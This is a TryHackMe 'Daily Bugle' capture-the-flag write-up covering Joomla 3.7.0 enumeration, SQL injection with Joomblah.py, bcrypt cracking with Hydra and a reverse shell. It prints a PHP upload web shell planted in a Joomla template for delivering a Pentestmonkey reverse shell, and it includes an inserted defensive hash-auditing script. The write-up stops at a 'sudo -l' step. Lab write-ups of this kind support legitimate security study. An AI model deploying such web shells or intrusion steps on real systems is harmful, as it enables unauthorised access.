TryHackMe — Daily Bugle Writeup

Nimantha Deshappriya
4 min read, May 28, 2020

Let’s find out how difficult this machine is in terms of enumeration, exploitation and privilege escalation.

I began the enumeration by opening Nmap.

There was a hidden directory named administrator. Opening it showed the login page for the Joomla admin portal. The login page doesn't reveal which version of Joomla is running, but fortunately there is a handy tool we can use to discover it: Joomscan.

Joomscan revealed that the version of Joomla was 3.7.0 which may be useful in terms of finding an exploit.

Knowing the Joomla version made it possible to find an exploit using Searchsploit.

This exploit describes that this version is vulnerable to SQL injection. Unfortunately, SQLMAP didn't work for me: it was unstable throughout the exploitation process and didn't provide any result. You should not rely on SQLMAP anyway, as it is not permitted in the exam.

TryHackMe also suggests using a Python script instead of SQLMAP, so I listened to what TryHackMe had to say and gave it a try. I found a Python script called Joomblah.py, which is designed to dump the user and session tables. The file can be downloaded here.

I got something back, which looked like it was a password hash.

Either hash-identifier or hashid can verify the type of the hash.

The hash type is bcrypt. This information can be used to form the Hydra request to crack the hashed password.
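When a dumped credential store turns up in an engagement report, the first defender question is what format the hashes are in and whether the work factor is adequate. The following is an added example (not from the original writeup or from Joomla) that parses the modular-crypt bcrypt format and Joomla's older md5:salt format and flags weak storage; the sample hashes are constructed and the minimum cost of 10 is an assumption.

```python
import re

# Modular-crypt bcrypt string: $2a$/$2b$/$2x$/$2y$, two-digit cost, 22-char salt, 31-char digest.
BCRYPT_RE = re.compile(r"\$(2[abxy])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})")
# Legacy Joomla (pre-3.2) storage: md5(password + salt) kept as "<32 hex>:<salt>".
LEGACY_MD5_RE = re.compile(r"([0-9a-f]{32}):([A-Za-z0-9]{16,32})")

# Constructed sample values (not real credentials, not taken from the machine).
SAMPLE_BCRYPT = "$2y$10$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234"
SAMPLE_LOW_COST = "$2y$04$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234"
SAMPLE_LEGACY = "5f4dcc3b5aa765d61d8327deb882cf99:abcdefghijklmnop"


def parse_bcrypt(h):
    """Split a bcrypt string into its fields; return None if it is not bcrypt."""
    m = BCRYPT_RE.fullmatch(h.strip())
    if not m:
        return None
    variant, cost, salt, digest = m.groups()
    return {"variant": variant, "cost": int(cost), "salt": salt, "digest": digest}


def identify(h):
    """Coarse format identification, the same job hash-identifier/hashid do."""
    s = h.strip()
    if parse_bcrypt(s):
        return "bcrypt"
    if LEGACY_MD5_RE.fullmatch(s):
        return "joomla-legacy-md5-salt"
    if re.fullmatch(r"[0-9a-f]{32}", s):
        return "unsalted-md5-like"
    return "unknown"


def audit(h, min_cost=10):
    """Findings a defender would raise when reviewing stored password hashes."""
    findings = []
    kind = identify(h)
    if kind == "bcrypt":
        cost = parse_bcrypt(h)["cost"]
        if cost < min_cost:
            # 2**cost rounds: cost 4 is roughly 64x cheaper to brute-force than cost 10.
            findings.append(f"bcrypt cost {cost} below minimum {min_cost}")
    elif kind != "unknown":
        findings.append(f"{kind}: fast legacy hash, rehash with bcrypt on next login")
    else:
        findings.append("unrecognised hash format")
    return findings
```

A finding on the legacy format is what you would expect from a Joomla install upgraded from 2.x without users logging in since, because Joomla only rehashes legacy entries at next successful login.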

With the use of Hydra, I was able to crack the password. It is a simple Hydra request that can be arranged as above using the rockyou wordlist.

Logged into the portal and found a way to obtain a reverse shell:

1. Go to Templates → Templates.

2. Open Beez3, click New, type upload as the file name and select PHP.

3. A new page called upload opens. Paste the following code on that page and click Save.

<?php
// Print the server's OS/kernel string as a quick check that PHP executes here.
echo '<b><br><br>' . php_uname() . '<br></b>';
// Minimal multipart upload form posting back to this same file.
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if (isset($_POST['_upl']) && $_POST['_upl'] == "Upload") {
    // Copy the uploaded temp file into the current (template) directory under its original name.
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo '<b>Upload Success !!!</b><br><br>';
    } else {
        echo '<b>Upload Failed</b><br><br>';
    }
}
?>

Navigate to the following path:

Host/templates/beez3/upload.php

It takes you to a page like the one below, where you can upload your reverse shell. I used the Pentestmonkey PHP reverse shell and then navigated to the location shown below to trigger the shell.

Make sure your Netcat listener is open before triggering the shell.

After thorough enumeration, I managed to recover a password that can be used for two purposes.

1. To log in to MySQL as root.

2. To log in to SSH as jjameson.

I first logged into MySQL as root but I couldn't use it for anything. As I was running out of ideas, I used the same password to log in to SSH as jjameson. It worked!

By typing sudo -l, we can list the commands that we are allowed to run with sudo.
